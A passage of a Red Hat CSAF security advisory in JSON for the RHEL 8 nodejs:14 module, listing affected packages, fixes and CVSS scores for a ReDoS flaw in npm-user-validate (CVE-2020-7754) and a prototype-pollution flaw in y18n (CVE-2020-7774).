"AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch" }, "product_reference": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src" }, "product_reference": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch" }, "product_reference": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src" }, "product_reference": "nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64" }, "product_reference": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le" }, "product_reference": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x" }, "product_reference": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64 as a component of nodejs:14:8030020210126165503:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" }, "product_reference": "npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7754", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-10-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1892430" } ], "notes": [ { "category": "description", "text": "This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Enterprise Linux 8 and Software Collections, `npm-user-validate` is used exclusively for `npm`. As a result, this vulnerability is considered Low in such a context.\n\nIn OpenShift Container Platform (OCP) 3.11 and 4.4 the kibana package has been marked Low (similar to RHEL8) as it is primarily used for npm and is protected via OpenShift OAuth. Additionally, whilst OCP 4.4 does deliver the kibana package, due to the code changing to container first content, it has been marked as wontfix at this time and may be fixed in a future release. \n\nAdditionally, the openshift4/ose-logging-kibana6 container is not represented on the CVE page as it gets npm from the Red Hat Software Collections and as such the ose-logging-kibana6 container will be updated when the rh-nodejs10-nodejs package is.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7754" }, { "category": "external", "summary": "RHBZ#1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7754", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7754" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754" }, { "category": "external", "summary": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p", "url": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p" } ], "release_date": "2020-10-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:28:03+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0551" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.0" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS" }, { "cve": "CVE-2020-7774", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "discovery_date": "2020-11-17T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1898680" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-y18n. There is a prototype pollution vulnerability in y18n\u0027s locale functionality. If an attacker is able to provide untrusted input via locale, they may be able to cause denial of service or in rare circumstances, impact to data integrity or confidentiality.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-y18n: prototype pollution vulnerability", "title": "Vulnerability summary" }, { "category": "other", "text": "In OpenShift Container Platform (OCP), OpenShift ServiceMesh (OSSM) and OpenShift distributed tracing the affected components are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-y18n library to authenticated users only, therefore the impact is Low.\n\nIn Red Hat OpenShift Container Storage 4 the noobaa-core container includes the affected version of y18n as a dependency of yargs. However, no unsafe usage found where the module accepts untrusted input and hence this issue has been rated as having a security impact of Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7774" }, { "category": "external", "summary": "RHBZ#1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7774", "url": 